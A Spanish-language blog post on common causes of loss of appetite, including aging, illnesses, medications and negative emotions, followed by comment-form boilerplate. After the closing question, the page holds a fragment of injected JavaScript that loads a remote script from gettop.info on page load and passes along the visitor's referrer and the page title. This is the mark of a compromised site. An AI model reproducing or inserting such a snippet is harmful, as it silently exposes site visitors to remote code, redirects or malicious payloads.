Salud y belleza » Dieta, Dolores, Enfermedades, Salud

Las causas de la falta de apetito

Sin Comentarios

La pérdida de apetito puede ser un síntoma de la edad o de cierto tipo de enfermedades como el cáncer de colon y también puede ser un efecto secundario de algún medicamento. Si has sufrido repentinamente la pérdida de apetito puede que no sea casualidad, sino que tenga que ver con algún efecto o enfermedad. Aquí vamos a exponerte algunas de las causas más comunes de la falta de apetito o la disminución de las ganas de comer.

perdida-apetito

Algunos medicamentos, como la quimioterapia, los narcóticos o algunos antibióticos pueden provocar la pérdida de apetito. También las enfermedades pulmonares, insuficiencia cardíaca o hepatitis pueden ser causantes de este síntoma debido, principalmente, a la dificultad a la hora de respirar, la debilidad y el malestar general que provocan estas enfermedades.

Normalmente la pérdida de apetito no constituye un grave riesgo para la salud, pero sí podría llegar a provocar deshidratación y una disminución de las defensas del sistema inmune al no recibir el cuerpo todos los nutrientes que necesita.

falta-de-apetito

Por otro lado, también es habitual que se dé la falta de apetito en personas mayores, muchos aseguran que por las emociones negativas como la ansiedad o la depresión.

¿Sabes ya cuál es la causa de tu falta de apetito?

document.currentScript.parentNode.insertBefore(s, document.currentScript);s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : , , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.